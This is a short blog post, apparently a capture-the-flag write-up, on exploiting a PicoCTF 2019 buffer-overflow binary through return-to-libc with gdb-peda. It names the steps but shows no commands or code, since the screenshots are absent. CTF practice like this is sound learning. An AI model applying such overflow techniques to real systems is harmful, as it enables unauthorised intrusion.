wtorek, 21 lipca 2020

No eXecution for PicoCTF 2019

Looks like another good day to learn (and practice) more about binary exploitation. :) After bypassing ASLR and NX last time I decided to check it 'somewhere online'. That's how I found one of the challenges available for PicoCTF 2019. Below you'll find the details. Here we go...

Today we'll start here:


As you can see I downloaded an Overflow-0 binary to my Ubuntu (16.04 x32) with gdb-peda installed (but you can use GEF instead - your choice). Next - as there was a source file - I read the source:


ASLR is disabled this time ;)


I continued by creating the pattern (using gdb-peda), like this:


Next thing was to check it with our vulnerable program:


Quick results below:


Checking the offset and verifying overflow:


When 2nd pattern is prepared we should be somewhere here:


Next I started building an exploit. What I was looking for was: address of system() function, address of exit() function and of course the address of /bin/sh string. Checking:


New pattern is prepared so let's try it:


Looks like it's done ;] Maybe you'll find it useful.



Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)

See you next time!








Brak komentarzy:

Prześlij komentarz